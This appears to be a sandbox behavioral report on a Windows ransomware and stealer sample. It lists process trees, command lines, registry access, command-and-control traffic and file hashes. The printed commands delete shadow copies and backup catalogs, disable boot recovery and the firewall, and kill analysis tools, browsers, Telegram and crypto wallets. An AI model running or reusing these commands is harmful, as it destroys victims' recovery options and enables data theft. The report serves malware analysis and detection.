PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\runas.exe
PID 1788 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\runas.exe
PID 2572 wrote to memory of 4620 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe

"C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe"

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2256 -ip 2256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 816

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

"C:\Users\Admin\AppData\Local\Microsoft\84`.exe"

C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe

"C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe"

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

"C:\Users\Admin\AppData\Local\Microsoft\84`.exe"

C:\Users\Admin\AppData\Local\Microsoft\xUZbuun.exe

"C:\Users\Admin\AppData\Local\Microsoft\xUZbuun.exe"

C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe

"C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2212 -ip 2212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 460

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\SYSTEM32\cmd.exe

cmd /c

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM edge.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\runas.exe

runas /user:Administrator C:\Users\Admin\AppData\Local\Temp\8846.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq regedit.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM regedit.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq taskmgr.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM taskmgr.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vboxservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vboxservice.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq df5serv.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM df5serv.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq processhacker.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM processhacker.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vboxtray.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vboxtray.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmtoolsd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmtoolsd.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmwaretray.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmwaretray.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ida64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ida64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ollydbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ollydbg.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq pestudio.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM pestudio.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmwareuser.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmwareuser.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vgauthservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vgauthservice.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmacthlp.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmacthlp.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x96dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x96dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmsrvc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmsrvc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x32dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x32dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmusrvc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmusrvc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq prl_cc.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM prl_cc.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq prl_tools.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM prl_tools.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq xenservice.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM xenservice.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-ga.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-ga.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq joeboxcontrol.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM joeboxcontrol.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ksdumperclient.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ksdumperclient.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ksdumper.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ksdumper.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq joeboxserver.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM joeboxserver.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Wireshark.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq idaq.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM idaq.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq idaq64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM idaq64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ida64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ida64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq OLLYDBG.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM OLLYDBG.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq WinDbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM WinDbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Procmon.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Procmon.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-tray.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-tray.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-vmx.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-vmx.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq vmware-authd.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vmware-authd.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VirtualBox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VirtualBox.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxSVC.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxSVC.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxNetDHCP.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxNetDHCP.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxNetNAT.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxNetNAT.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq VBoxHeadless.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM VBoxHeadless.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-system-x86_64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-system-x86_64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq qemu-system-arm.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM qemu-system-arm.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq pythonw.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM pythonw.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python3.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python3.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq python3w.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM python3w.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Taskmgr.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Taskmgr.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq msconfig.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msconfig.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq regedit.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM regedit.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x64dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x64dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq x32dbg.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM x32dbg.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq radare2.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM radare2.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq r2.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM r2.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Ghidra.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Ghidra.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ImmunityDebugger.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ImmunityDebugger.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ImmunityDebugger.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ImmunityDebugger.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Fiddler.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\taskkill.exe

taskkill /F /IM Fiddler.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq tcpview.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpview.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Sysmon.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\taskkill.exe

taskkill /F /IM Sysmon.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ProcessHacker.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ProcessHacker.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq ApateDNS.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ApateDNS.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Cuckoo.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Cuckoo.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq CFF Explorer.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM "CFF Explorer.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Wireshark.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq Regshot.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Regshot.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq procexp.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM procexp.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq procexp64.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM procexp64.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe

PowerShell -Command Add-Type -AssemblyName "System.Windows.Forms;$clip=[Windows.Forms.Clipboard]::GetImage();if ($clip -ne $null) { $clip.Save('C:\Users\Admin\AppData\Local\Temp\2985226527') };"

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\Wbem\wmic.exe

wmic desktopmonitor get "screenheight, screenwidth"

C:\Windows\system32\cmd.exe

cmd /C net session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get uuid

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

cmd /C "C:\Users\Admin\AppData\Local\Temp\My Phone.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM bitcoin-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM litecoin-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dash-qt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM geth.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM electrum.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM exodus.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM atomic.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM monero-wallet-gui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM monerod.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM coinomi.exe

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

C:\Windows\system32\curl.exe

curl -s ipinfo.io/country

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 servblog25.xyz udp
DE 45.131.66.61:80 servblog25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
DE 45.131.66.61:80 servblog25.xyz tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
DE 45.131.66.61:80 servblog25.xyz tcp
US 8.8.8.8:53 serverxlogs21.xyz udp
DE 45.131.66.120:80 serverxlogs21.xyz tcp
US 8.8.8.8:53 netflixxonline.processing-updates.site udp
CA 172.105.107.189:443 netflixxonline.processing-updates.site tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 189.107.105.172.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
DE 45.131.66.120:80 serverxlogs21.xyz tcp
US 8.8.8.8:53 254.21.238.8.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 serverxlogs21.xyz udp
DE 45.131.66.120:80 serverxlogs21.xyz tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp
DE 167.86.123.82:8080 167.86.123.82 tcp
US 34.117.59.81:80 ipinfo.io tcp
US 34.117.59.81:80 ipinfo.io tcp

Files

memory/2256-134-0x0000000002D60000-0x0000000002E60000-memory.dmp

memory/2256-135-0x0000000004950000-0x00000000049C1000-memory.dmp

memory/2256-136-0x0000000000400000-0x0000000002B7C000-memory.dmp

memory/2256-137-0x0000000002D40000-0x0000000002D47000-memory.dmp

memory/2256-138-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/2256-139-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/2256-140-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/2256-141-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/2256-142-0x0000000002D60000-0x0000000002E60000-memory.dmp

memory/4956-143-0x000001D07C080000-0x000001D07C083000-memory.dmp

memory/2256-145-0x00000000059F0000-0x0000000005A26000-memory.dmp

memory/2256-144-0x0000000000400000-0x0000000002B7C000-memory.dmp

memory/2256-148-0x0000000004950000-0x00000000049C1000-memory.dmp

memory/2256-152-0x00000000059F0000-0x0000000005A26000-memory.dmp

memory/2256-153-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/2256-155-0x0000000000400000-0x0000000002B7C000-memory.dmp

memory/2256-156-0x0000000004D30000-0x0000000005130000-memory.dmp

memory/4956-157-0x000001D07C080000-0x000001D07C083000-memory.dmp

memory/4956-158-0x000001D07E140000-0x000001D07E147000-memory.dmp

memory/4956-159-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-160-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-161-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-162-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-163-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-165-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-167-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-168-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-169-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-170-0x00007FFF496F0000-0x00007FFF498E5000-memory.dmp

memory/4956-171-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-172-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-173-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-174-0x00007FF450500000-0x00007FF45062D000-memory.dmp

memory/4956-175-0x00007FF450500000-0x00007FF45062D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

MD5 f56ab31379d92b546875eff976ec9148
SHA1 79ba7f22410a64adf18e36005cfa98179f128053
SHA256 d509b4fc5c6dd7c8c9b2bec568f39ad1b0a9724a8046b342e207d5c5c260b4d0
SHA512 650ddd099dfa9de50c6e5493c4d33c7dcaeb9827069becfb5756b802789926e1520c9672685ed6afb2b4c4e960ab860aa6a35e1fa6dc4b5de1b023efacc09258

C:\Users\Admin\AppData\Local\Microsoft\84`.exe

MD5 f56ab31379d92b546875eff976ec9148
SHA1 79ba7f22410a64adf18e36005cfa98179f128053
SHA256 d509b4fc5c6dd7c8c9b2bec568f39ad1b0a9724a8046b342e207d5c5c260b4d0
SHA512 650ddd099dfa9de50c6e5493c4d33c7dcaeb9827069becfb5756b802789926e1520c9672685ed6afb2b4c4e960ab860aa6a35e1fa6dc4b5de1b023efacc09258

